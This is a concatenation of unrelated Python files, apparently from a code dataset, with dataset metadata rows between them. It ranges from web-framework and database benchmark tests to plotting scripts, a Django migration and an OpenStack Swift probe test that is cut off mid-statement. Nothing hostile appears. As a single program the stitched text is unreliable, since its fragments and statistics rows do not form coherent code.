self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_feedback_field_border_nonexistent_path(self):
query = '{path}=border'
with self.application(self.new_environ(query=query)):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=False)
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_render_ayame_message(self):
with self.application(self.new_environ(accept='en')):
p = TomatoPage()
status, headers, content = p()
html = self.format(TomatoPage, message='before, body, after')
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_render_ayame_message_ja(self):
with self.application(self.new_environ(accept='ja, en')):
p = TomatoPage()
status, headers, content = p()
html = self.format(TomatoPage, message='\u524d, \u4e2d, \u5f8c')
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
class MarkupContainer(ayame.MarkupContainer):
def render(self):
m = self.load_markup()
self.head = self.find_head(m.root)
html = super().render(m.root)
return m, html
class Border(border.Border):
def __init__(self, id, model=None):
super().__init__(id, model)
self.add(basic.Label('class', self.__class__.__name__))
self.body.find('class').render_body_only = True
def page(self):
for parent in self.iter_parent():
pass
return parent
class TomatoPage(ayame.Page):
html_t = textwrap.dedent("""\
<?xml version="1.0"?>
{doctype}
<html xmlns="{xhtml}">
<head>
<title>TomatoPage</title>
</head>
<body>
<p>{message}</p>
</body>
</html>
""")
def __init__(self):
super().__init__()
self.add(TomatoBorder('border'))
class TomatoBorder(Border):
pass
class ShallotsPage(ayame.Page):
html_t = textwrap.dedent("""\
<?xml version="1.0"?>
{doctype}
<html xmlns="{xhtml}">
<head>
<title>ShallotsPage</title>
</head>
<body>
<form action="/" method="post">
<div class="ayame-hidden"><input name="{path}" type="hidden" value="form" /></div>
<fieldset>
<legend>form</legend>
{error}
</fieldset>
</form>
</body>
</html>
""")
kwargs = {
'error': lambda v=False: textwrap.indent(textwrap.dedent("""\
<div class="field-error">
<input name="field:field_body:text" type="text" value="" /><br />
<p class="feedback">'text' is required</p>
</div>
""" if v else """\
<div class="field">
<input name="field:field_body:text" type="text" value="" /><br />
</div>
"""), ' ' * 8).rstrip(),
}
def __init__(self):
super().__init__()
self.add(form.Form('form'))
self.find('form').add(border.FeedbackFieldBorder('field'))
self.find('form:field').add(form.TextField('text'))
self.find('form:field:field_body:text').required = True
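The `kwargs['error']` template above chains `textwrap.dedent` and `textwrap.indent` to normalize and then re-indent an HTML fragment. The pattern in isolation, with a hypothetical fragment:

```python
import textwrap

# Hypothetical HTML fragment standing in for the 'error' kwarg body above.
raw = """\
    <div class="field">
      <input type="text" />
    </div>
"""
block = textwrap.dedent(raw)                      # strip the common 4-space margin
block = textwrap.indent(block, " " * 8).rstrip()  # re-indent every line by 8 spaces
```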
# File: Tommimon/10/oneline.py (Tommimon/advent-of-code-2020, MIT)
print((lambda n:(len(n)-((max(n)+3-len(n))//2))*((max(n)+3-len(n))//2))([0]+list(map(int,open("i","r").read().split('\n')))))
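The one-liner above solves Advent of Code 2020 day 10, part 1. A readable expansion, valid under the puzzle's guarantee that consecutive joltage gaps are only ever 1 or 3 jolts: with `chain = [0] + adapters`, `ones + threes == len(chain)` (the built-in device adds one final 3-jolt gap) and `ones + 3*threes == max(chain) + 3`, so `threes` falls out by subtraction.

```python
def joltage_product(adapters):
    """Count of 1-jolt gaps times count of 3-jolt gaps, per the derivation above."""
    chain = [0] + list(adapters)
    threes = (max(chain) + 3 - len(chain)) // 2
    ones = len(chain) - threes
    return ones * threes
```

On the small worked example from the puzzle statement (7 one-jolt gaps, 5 three-jolt gaps) this returns 35.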
# File: nixnet/database/_database_object.py (ni-ldp/nixnet-python, MIT)
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class DatabaseObject(object):
"""Database object interface."""
# File: src/test/integration/test_object_spec.py (kyle-singer/aerospike-benchmark, Apache-2.0)
] | 8 | 2020-11-26T03:01:30.000Z | 2022-01-06T22:40:28.000Z |
import lib
def _run_and_check(obj_spec, check):
    # Insert 100 records with the given object spec, then validate "testbin" on every record.
    lib.run_benchmark("--workload I --start-key 0 --keys 100 -o " + obj_spec + " --random")
    lib.check_for_range(0, 100, lambda meta, key, bins: check(bins["testbin"]))
def test_b():
    _run_and_check("b", lib.obj_spec_is_b)
def test_const_b_true():
    _run_and_check("true", lambda b: lib.obj_spec_is_const_b(b, True))
def test_const_b_false():
    _run_and_check("false", lambda b: lib.obj_spec_is_const_b(b, False))
def test_I1():
    _run_and_check("I1", lib.obj_spec_is_I1)
def test_I2():
    _run_and_check("I2", lib.obj_spec_is_I2)
def test_I3():
    _run_and_check("I3", lib.obj_spec_is_I3)
def test_I4():
    _run_and_check("I4", lib.obj_spec_is_I4)
def test_I5():
    _run_and_check("I5", lib.obj_spec_is_I5)
def test_I6():
    _run_and_check("I6", lib.obj_spec_is_I6)
def test_I7():
    _run_and_check("I7", lib.obj_spec_is_I7)
def test_I8():
    _run_and_check("I8", lib.obj_spec_is_I8)
def test_const_I():
    _run_and_check("123", lambda b: lib.obj_spec_is_const_I(b, 123))
def test_D():
    _run_and_check("D", lib.obj_spec_is_D)
def test_const_D():
    _run_and_check("123.456", lambda b: lib.obj_spec_is_const_D(b, 123.456))
def test_S1():
    _run_and_check("S1", lambda b: lib.obj_spec_is_S(b, 1))
def test_S2():
    _run_and_check("S2", lambda b: lib.obj_spec_is_S(b, 2))
def test_S3():
    _run_and_check("S3", lambda b: lib.obj_spec_is_S(b, 3))
def test_S4():
    _run_and_check("S4", lambda b: lib.obj_spec_is_S(b, 4))
def test_S5():
    _run_and_check("S5", lambda b: lib.obj_spec_is_S(b, 5))
def test_S6():
    _run_and_check("S6", lambda b: lib.obj_spec_is_S(b, 6))
def test_S7():
    _run_and_check("S7", lambda b: lib.obj_spec_is_S(b, 7))
def test_S8():
    _run_and_check("S8", lambda b: lib.obj_spec_is_S(b, 8))
def test_S100():
    _run_and_check("S100", lambda b: lib.obj_spec_is_S(b, 100))
def test_S10000():
    _run_and_check("S10000", lambda b: lib.obj_spec_is_S(b, 10000))
def test_const_S():
    _run_and_check("\\\"test\\ string\\\"", lambda b: lib.obj_spec_is_const_S(b, "test string"))
def test_B1():
    _run_and_check("B1", lambda b: lib.obj_spec_is_B(b, 1))
def test_B2():
    _run_and_check("B2", lambda b: lib.obj_spec_is_B(b, 2))
def test_B3():
    _run_and_check("B3", lambda b: lib.obj_spec_is_B(b, 3))
def test_B4():
    _run_and_check("B4", lambda b: lib.obj_spec_is_B(b, 4))
def test_B5():
    _run_and_check("B5", lambda b: lib.obj_spec_is_B(b, 5))
def test_B6():
    _run_and_check("B6", lambda b: lib.obj_spec_is_B(b, 6))
def test_B7():
    _run_and_check("B7", lambda b: lib.obj_spec_is_B(b, 7))
def test_B8():
    _run_and_check("B8", lambda b: lib.obj_spec_is_B(b, 8))
def test_B100():
    _run_and_check("B100", lambda b: lib.obj_spec_is_B(b, 100))
def test_B10000():
    _run_and_check("B10000", lambda b: lib.obj_spec_is_B(b, 10000))
def test_list():
def check_bin(b):
assert(type(b) is list)
assert(len(b) == 7)
lib.obj_spec_is_I1(b[0])
lib.obj_spec_is_I2(b[1])
lib.obj_spec_is_I3(b[2])
lib.obj_spec_is_S(b[3], 10)
lib.obj_spec_is_B(b[4], 20)
lib.obj_spec_is_D(b[5])
lib.obj_spec_is_b(b[6])
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o [I1,I2,I3,S10,B20,D,b] --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_map():
def check_bin(b):
assert(type(b) is dict)
assert(len(b) == 50)
for key in b:
lib.obj_spec_is_S(key, 5)
lib.obj_spec_is_I4(b[key])
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o {50*S5:I4} --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_const_map():
def check_bin(b):
assert(type(b) is dict)
assert(len(b) == 1)
for key in b:
lib.obj_spec_is_const_I(key, 123)
lib.obj_spec_is_const_S(b[key], "string")
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o {123:\\\"string\\\"} --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_compound():
def check_bin(b):
assert(type(b) is list)
assert(len(b) == 3)
assert(type(b[0]) is dict)
assert(len(b[0]) == 50)
for key in b[0]:
lib.obj_spec_is_S(key, 5)
lib.obj_spec_is_I4(b[0][key])
lib.obj_spec_is_I3(b[1])
assert(type(b[2]) is list)
assert(len(b[2]) == 4)
lib.obj_spec_is_D(b[2][0])
lib.obj_spec_is_I2(b[2][1])
assert(type(b[2][2]) is dict)
assert(len(b[2][2]) == 10)
for key in b[2][2]:
lib.obj_spec_is_I5(key)
lib.obj_spec_is_S(b[2][2][key], 11)
lib.obj_spec_is_b(b[2][3])
lib.run_benchmark("--workload I --start-key 0 --keys 100 " +
"-o [{50*S5:I4},I3,[D,I2,{10*I5:S11},b]] --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_multiple_bins():
def check_bins(b):
assert(len(b) == 7)
lib.obj_spec_is_I1(b["testbin"])
lib.obj_spec_is_I2(b["testbin_2"])
lib.obj_spec_is_I3(b["testbin_3"])
lib.obj_spec_is_S(b["testbin_4"], 10)
lib.obj_spec_is_B(b["testbin_5"], 20)
lib.obj_spec_is_D(b["testbin_6"])
lib.obj_spec_is_b(b["testbin_7"])
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I1,I2,I3,S10,B20,D,b --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bins(bins))
def test_compound_multiple_bins():
def check_bins(b):
assert(len(b) == 7)
assert(type(b["testbin"]) is list)
lib.obj_spec_is_I1(b["testbin"][0])
assert(type(b["testbin"][1]) is dict)
assert(len(b["testbin"][1]) == 45)
for key in b["testbin"][1]:
lib.obj_spec_is_S(key, 32)
lib.obj_spec_is_B(b["testbin"][1][key], 20)
lib.obj_spec_is_I2(b["testbin_2"])
lib.obj_spec_is_I3(b["testbin_3"])
assert(type(b["testbin_4"]) is dict)
assert(len(b["testbin_4"]) == 1)
for key in b["testbin_4"]:
lib.obj_spec_is_S(key, 10)
lib.obj_spec_is_I4(b["testbin_4"][key])
lib.obj_spec_is_B(b["testbin_5"], 20)
assert(type(b["testbin_6"]) is list)
assert(len(b["testbin_6"]) == 10)
for item in b["testbin_6"]:
lib.obj_spec_is_D(item)
lib.obj_spec_is_b(b["testbin_7"])
lib.run_benchmark("--workload I --start-key 0 --keys 100 " +
"-o [I1,{45*S32:B20}],I2,I3,{S10:I4},B20,[10*D],b --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bins(bins))
| 38.503876 | 109 | 0.686531 | 1,881 | 9,934 | 3.400319 | 0.04891 | 0.066604 | 0.111007 | 0.133208 | 0.894622 | 0.829425 | 0.792683 | 0.767824 | 0.763133 | 0.755629 | 0 | 0.071092 | 0.123515 | 9,934 | 257 | 110 | 38.653697 | 0.663489 | 0 | 0 | 0.166667 | 0 | 0.025253 | 0.279501 | 0.010371 | 0 | 0 | 0 | 0 | 0.116162 | 1 | 0.237374 | false | 0 | 0.005051 | 0 | 0.242424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bde488d1b4bdd414a90b8ecc40fa76af472c89b2 | 1,292 | py | Python | stn/data_loader.py | lzmisscc/emoran | f7360ac21b0c8657244d75ec927020fb26c41fea | [
"MIT"
] | null | null | null | stn/data_loader.py | lzmisscc/emoran | f7360ac21b0c8657244d75ec927020fb26c41fea | [
"MIT"
] | null | null | null | stn/data_loader.py | lzmisscc/emoran | f7360ac21b0c8657244d75ec927020fb26c41fea | [
"MIT"
] | 1 | 2021-02-03T18:40:44.000Z | 2021-02-03T18:40:44.000Z | # encoding: utf-8
import torch
import random
from torchvision import datasets, transforms
def _make_loader(args, train):
    # The train and test loaders differ only in the `train` flag passed to datasets.MNIST.
    return torch.utils.data.DataLoader(
        datasets.MNIST(
            'mnist_data',
            train=train,
            download=True,
            transform=transforms.Compose([
                transforms.Lambda(lambda image: image.rotate(random.random() * args.angle * 2 - args.angle)),
                transforms.Resize((args.image_height, args.image_width)),
                transforms.ToTensor(),
            ]),
        ),
        batch_size=args.batch_size,
        shuffle=True,
        num_workers=4,
        pin_memory=True if args.cuda else False,
    )
def get_train_loader(args):
    return _make_loader(args, train=True)
def get_test_loader(args):
    return _make_loader(args, train=False)
| 28.711111 | 109 | 0.578947 | 136 | 1,292 | 5.367647 | 0.338235 | 0.049315 | 0.043836 | 0.057534 | 0.857534 | 0.857534 | 0.857534 | 0.857534 | 0.857534 | 0.857534 | 0 | 0.005669 | 0.317337 | 1,292 | 44 | 110 | 29.363636 | 0.821995 | 0.01161 | 0 | 0.756757 | 0 | 0 | 0.015686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.081081 | 0.054054 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da0b2447d2d4f8efa58ebc5cdf8876fbd14c4471 | 3,596 | py | Python | core_gap_stats.py | AndrzejTunkiel/Tape | 1f6a7c337d9f3557452cb5c80c2dfc4d99085be3 | [
"MIT"
] | null | null | null | core_gap_stats.py | AndrzejTunkiel/Tape | 1f6a7c337d9f3557452cb5c80c2dfc4d99085be3 | [
"MIT"
] | null | null | null | core_gap_stats.py | AndrzejTunkiel/Tape | 1f6a7c337d9f3557452cb5c80c2dfc4d99085be3 | [
"MIT"
] | 1 | 2021-11-15T01:21:22.000Z | 2021-11-15T01:21:22.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 17 09:36:28 2021
@author: llothar
"""
from statistics_module import stats
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
plt.style.use(['science','no-latex'])
df = pd.read_csv('f9ad.csv')
#%%
s, m, per = stats(df)
target = 'MWD Continuous Inclination dega'
#plt.style.use(['science','no-latex'])
## Gap statistics for target
#
# This chart will show the percentage of dataset occupied by gaps of a certain
# size. Gaps are normal in drilling logs and nothing to be afraid of
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
my_figsize = (7,2.5)
plt.figure(figsize=my_figsize)
y = per[target]['percentage_cells_occupied']
plt.xticks(x, x_label, rotation=90)
plt.bar(x,y, color='gray')
#plt.title(f'Gap distribution in:\n {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Dataset occupied [%]')
plt.xlim(-1,51)
#x_labels = x.tolist()
#x_labels[0] = 'data'
#plt.xticks(x, x_labels)
plt.grid()
plt.tight_layout()
plt.savefig('raw_gaps_stats.pdf')
plt.show()
## Outlier detection
outlier_cutoff = 0.005 #arbitrarily selected
# calculation that penalizes long, rare, continuous gaps
out_coef = per[target]['gap_sizes'] / (per[target]['gap_counts'] * len(df))
x = np.arange(0,len(per[target]['gap_sizes']),1)
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
plt.figure(figsize=my_figsize)
plt.xticks(x, x_label, rotation=90)
plt.bar(x,out_coef, color='gray')
#plt.ylim(0,0.005)
plt.plot([-1,51],[outlier_cutoff]*2, color='black', label='cutoff',
linestyle='--')
plt.legend()
# x_labels = x.tolist()
# x_labels[0] = 'data'
# plt.xticks(x, x_labels)
plt.xlim(-1,51)
#plt.title(f'Gap coefficient in: {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Gap coefficient')
plt.grid()
plt.tight_layout()
plt.savefig('proc_gaps_stats.pdf')
plt.show()
#%%
#%%
s, m, per = stats(df)
target = 'Average Surface Torque kN.m'
#plt.style.use(['science','no-latex'])
## Gap statistics for target
#
# This chart will show the percentage of dataset occupied by gaps of a certain
# size. Gaps are normal in drilling logs and nothing to be afraid of
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
my_figsize = (5,2.5)
plt.figure(figsize=my_figsize)
y = per[target]['percentage_cells_occupied']
plt.xticks(x, x_label, rotation=90)
plt.bar(x,y, color='gray')
#plt.title(f'Gap distribution in:\n {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Dataset occupied [%]')
plt.xlim(-1,16)
# x_labels = x.tolist()
# x_labels[0] = 'data'
# plt.xticks(x, x_labels)
plt.grid()
plt.tight_layout()
plt.savefig('raw_gaps_stats_phd.pdf')
plt.show()
## Outlier detection
outlier_cutoff = 0.005 #arbitrarily selected
# calculation that penalizes long, rare, continuous gaps
out_coef = per[target]['gap_sizes'] / (per[target]['gap_counts'] * len(df))
x = np.arange(0,len(per[target]['gap_sizes']),1)
x_label = per[target]['gap_sizes']
x = np.arange(0, len(x_label),1)
plt.figure(figsize=my_figsize)
plt.xticks(x, x_label, rotation=90)
plt.bar(x,out_coef, color='gray')
#plt.ylim(0,0.005)
plt.plot([-1,16],[outlier_cutoff]*2, color='black', label='cutoff',
linestyle='--')
plt.legend()
# x_labels = x.tolist()
# x_labels[0] = 'data'
# plt.xticks(x, x_labels)
plt.xlim(-1,16)
#plt.title(f'Gap coefficient in: {target}')
plt.xlabel('Gap length [rows]')
plt.ylabel('Gap coefficient')
plt.grid()
plt.tight_layout()
plt.savefig('proc_gaps_stats_phd.pdf')
plt.show()
plt.scatter(df['Measured Depth m'], df[target], s=1)
plt.show() | 25.323944 | 78 | 0.698554 | 607 | 3,596 | 4.026359 | 0.237232 | 0.02946 | 0.0491 | 0.055646 | 0.885025 | 0.880933 | 0.849427 | 0.849427 | 0.849427 | 0.849427 | 0 | 0.02644 | 0.116518 | 3,596 | 142 | 79 | 25.323944 | 0.742839 | 0.32703 | 0 | 0.776316 | 0 | 0 | 0.211303 | 0.040067 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e527d7578838a8f2a99fbbbb5db91ca83f935d81 | 145 | py | Python | blocksec2go/comm/__init__.py | Infineon/BlockchainSecurity2Go-Python-lib | 477753ae888e2b1c36b851daf150b9734ab99e60 | [
"MIT"
] | 14 | 2019-03-08T11:03:22.000Z | 2021-12-31T07:20:52.000Z | blocksec2go/comm/__init__.py | Infineon/BlockchainSecurity2Go-Python-lib | 477753ae888e2b1c36b851daf150b9734ab99e60 | [
"MIT"
] | 13 | 2019-07-25T10:43:25.000Z | 2021-12-22T13:55:41.000Z | blocksec2go/comm/__init__.py | Infineon/BlockchainSecurity2Go-Python-lib | 477753ae888e2b1c36b851daf150b9734ab99e60 | [
"MIT"
] | 6 | 2019-03-25T22:48:24.000Z | 2021-12-07T15:53:52.000Z | from blocksec2go.comm.pyscard import open_pyscard
from blocksec2go.comm.base import CardError
from blocksec2go.comm.card_observer import observer | 48.333333 | 51 | 0.882759 | 20 | 145 | 6.3 | 0.5 | 0.357143 | 0.452381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022388 | 0.075862 | 145 | 3 | 51 | 48.333333 | 0.91791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e54c1e20032181d545824909664737fe413d1314 | 18,290 | py | Python | avg.py | svenazari/avg | 0f6e9c6d1c53354b0dd10002c3dc419bd74869ad | [
"MIT"
] | null | null | null | avg.py | svenazari/avg | 0f6e9c6d1c53354b0dd10002c3dc419bd74869ad | [
"MIT"
] | null | null | null | avg.py | svenazari/avg | 0f6e9c6d1c53354b0dd10002c3dc419bd74869ad | [
"MIT"
] | null | null | null | #avg.py
#author: Sven Azari
#http://www.github.com/svenazari
#commands: del, del1, izl, show, memload, memclear
#The memload command requires the file '.avg_mem.txt' in the same folder as the script.
from os import system, name
from os.path import exists
def clear(): #clear the screen
    if name == 'nt':
        _ = system('cls')
    else:
        _ = system('clear')
def print_averages(Traz, Uraz): #compute and print the mean differences
    try:
        Tsred = str(round(sum(Traz) / len(Traz), 1)) #mean air-temperature difference (len(Traz) - length of the list)
        Usred = str(round(sum(Uraz) / len(Uraz))) #mean relative-humidity difference
    except ZeroDivisionError: #the lists hold no data
        print("Učitana memorija ne sadrži podatke!")
    else:
        print("# dTs = " + Tsred + " #")
        print("# dUs = " + Usred + " #")
        print("(Srednju razliku treba dodati na podatak AMP-a)")
        print("* * * ")
def handle_command(value, Traz, Uraz): #shared handling of the control commands; returns True if 'value' was a command
    if value == "show":
        print(Traz)
        print(Uraz)
        print("* * * ")
        return True
    elif value in ("del", "del1"): #del removes the newest entry, del1 the oldest
        clear()
        index = -1 if value == "del" else 0
        try:
            del Traz[index]
            del Uraz[index]
        except IndexError: #the lists are already empty
            print("Učitana memorija ne sadrži podatke!")
        else:
            print_averages(Traz, Uraz)
        return True
    elif value == "memload": #load the saved differences - memload discards any existing calculation
        clear()
        Traz.clear()
        Uraz.clear()
        with open('.avg_mem.txt') as mem:
            memlf = [float(line) for line in mem.readlines()] #read the lines as floats
        x = int(len(memlf) / 2) #first half of the file: temperature differences, second half: humidity differences
        Traz.extend(memlf[:x]) #append the stored temperature differences
        Uraz.extend(memlf[x:]) #append the stored humidity differences
        print_averages(Traz, Uraz)
        return True
    elif value == "memclear": #clear the script's memory
        clear()
        Traz.clear()
        Uraz.clear()
        print("Memorija skripte je očišćena!")
        return True
    elif value == "izl": #quit
        clear()
        exit()
    return False
def average():
    clear()
    if not exists('.avg_mem.txt'): #create .avg_mem.txt if it is missing, so the results can be saved after the calculations
        open('.avg_mem.txt', 'w+').close()
    Traz = [] #list of air-temperature differences
    Uraz = [] #list of relative-humidity differences
    while True:
        Tk = input("Tk = ") #air temperature, manual reading
        if handle_command(Tk, Traz, Uraz):
            continue
        Ta = input("Ta = ") #air temperature, automatic reading
        if handle_command(Ta, Traz, Uraz):
            continue
        print("*")
        Uk = input("Uk = ") #relative humidity, manual reading
        if handle_command(Uk, Traz, Uraz):
            continue
        Ua = input("Ua = ") #relative humidity, automatic reading
        if handle_command(Ua, Traz, Uraz):
            continue
        clear()
        try:
            Tkf = float(Tk.replace(",", "."))
            Taf = float(Ta.replace(",", "."))
            Ukf = float(Uk.replace(",", "."))
            Uaf = float(Ua.replace(",", "."))
        except ValueError: #the input could not be converted to float
            print("Nedostaje podatak ili podaci nisu uneseni u odgovarajućem obliku!")
            continue
        Traz.append(round(Tkf - Taf, 1)) #append the difference to the temperature list
        Uraz.append(round(Ukf - Uaf)) #append the difference to the humidity list
        print_averages(Traz, Uraz)
        #save the differences so they can be reloaded the next time the script starts
        with open(".avg_mem.txt", "w") as upis:
            for line in Traz: #write the temperature differences
                upis.write(str(round(line, 1)) + '\n')
            for line in Uraz: #write the humidity differences
                upis.write(str(round(line)) + '\n')
average()

# app/blog_posts/__init__.py (repo: REAGAN2020/Blog-posts, MIT license)
from flask import Blueprint
blog_posts = Blueprint('blog_posts', __name__)
from . import views

# src/django/api/migrations/0026_add_product_and_production_types_to_facilityclaim.py
# (repo: azavea/open-apparel-registry, MIT license)
# Generated by Django 2.0.13 on 2019-07-12 19:36
import django.contrib.postgres.fields
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('api', '0025_add_productiontype_and_producttype'),
    ]

    operations = [
        migrations.AddField(
            model_name='facilityclaim',
            name='facility_product_types',
            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A product produced at the facility', max_length=50, verbose_name='product type'), blank=True, help_text='The products produced at the facility', null=True, size=None, verbose_name='product types'),
        ),
        migrations.AddField(
            model_name='facilityclaim',
            name='facility_production_types',
            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A production type associated with the facility', max_length=50, verbose_name='production type'), blank=True, help_text='The production types associated with the facility', null=True, size=None, verbose_name='production types'),
        ),
        migrations.AddField(
            model_name='historicalfacilityclaim',
            name='facility_product_types',
            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A product produced at the facility', max_length=50, verbose_name='product type'), blank=True, help_text='The products produced at the facility', null=True, size=None, verbose_name='product types'),
        ),
        migrations.AddField(
            model_name='historicalfacilityclaim',
            name='facility_production_types',
            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(help_text='A production type associated with the facility', max_length=50, verbose_name='production type'), blank=True, help_text='The production types associated with the facility', null=True, size=None, verbose_name='production types'),
        ),
    ]

# EEG_Lightning/dassl/data/__init__.py (repo: mcd4874/NeurIPS_competition, MIT license)
from .data_manager import DataManager
from .data_manager import MultiDomainDataManager

# test/probe/test_container_failures.py (repo: ivancich/ceph-swift-fork, Apache-2.0 license)
#!/usr/bin/python -u
# Copyright (c) 2010-2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
from os import kill
from signal import SIGTERM
from subprocess import Popen
from time import sleep
from uuid import uuid4
import eventlet
import sqlite3
from swift.common import client, direct_client
from swift.common.utils import hash_path, readconf
from test.probe.common import get_to_final_state, kill_pids, reset_environment
class TestContainerFailures(unittest.TestCase):

    def setUp(self):
        self.pids, self.port2server, self.account_ring, self.container_ring, \
            self.object_ring, self.url, self.token, self.account = \
            reset_environment()

    def tearDown(self):
        kill_pids(self.pids)

    def test_first_node_fail(self):
        container = 'container-%s' % uuid4()
        client.put_container(self.url, self.token, container)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        object1 = 'object1'
        client.put_object(self.url, self.token, container, object1, 'test')
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertIn(object1, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])
        cpart, cnodes = self.container_ring.get_nodes(self.account, container)
        kill(self.pids[self.port2server[cnodes[0]['port']]], SIGTERM)
        client.delete_object(self.url, self.token, container, object1)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        self.pids[self.port2server[cnodes[0]['port']]] = \
            Popen(['swift-container-server',
                   '/etc/swift/container-server/%d.conf' %
                   ((cnodes[0]['port'] - 6001) // 10)]).pid
        sleep(2)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        # This is okay because the first node hasn't got the update that the
        # object was deleted yet.
        self.assertIn(object1, [o['name'] for o in
                                direct_client.direct_get_container(
                                    cnodes[0], cpart, self.account,
                                    container)[1]])
        # Unfortunately, the following might pass or fail, depending on the
        # position of the account server associated with the first container
        # server we had killed. If the associated one happens to be the first
        # account server, this will pass; otherwise the first account server
        # will serve the listing and not have the container.
        # self.assertIn(container, [c['name'] for c in
        #                           client.get_account(self.url, self.token)[1]])
        object2 = 'object2'
        # This will work because at least one (in this case, just one) account
        # server has to indicate the container exists for the put to continue.
        client.put_object(self.url, self.token, container, object2, 'test')
        # First node still doesn't know object1 was deleted yet; this is okay.
        self.assertIn(object1, [o['name'] for o in
                                direct_client.direct_get_container(
                                    cnodes[0], cpart, self.account,
                                    container)[1]])
        # And, of course, our new object2 exists.
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])
        get_to_final_state()
        # Our container delete never "finalized" because we started using the
        # container again before the delete settled.
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        # And so object2 should still exist and object1's delete should have
        # finalized.
        self.assertNotIn(object1, [o['name'] for o in
                                   client.get_container(self.url, self.token,
                                                        container)[1]])
        self.assertIn(object2, [o['name'] for o in
                                client.get_container(self.url, self.token,
                                                     container)[1]])

    def test_second_node_fail(self):
        container = 'container-%s' % uuid4()
        client.put_container(self.url, self.token, container)
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        object1 = 'object1'
        client.put_object(self.url, self.token, container, object1, 'test')
        self.assertIn(container, [c['name'] for c in
                                  client.get_account(self.url, self.token)[1]])
        self.assertIn(object1, [o['name'] for o in
                                client.get_container(self.url, self.token,
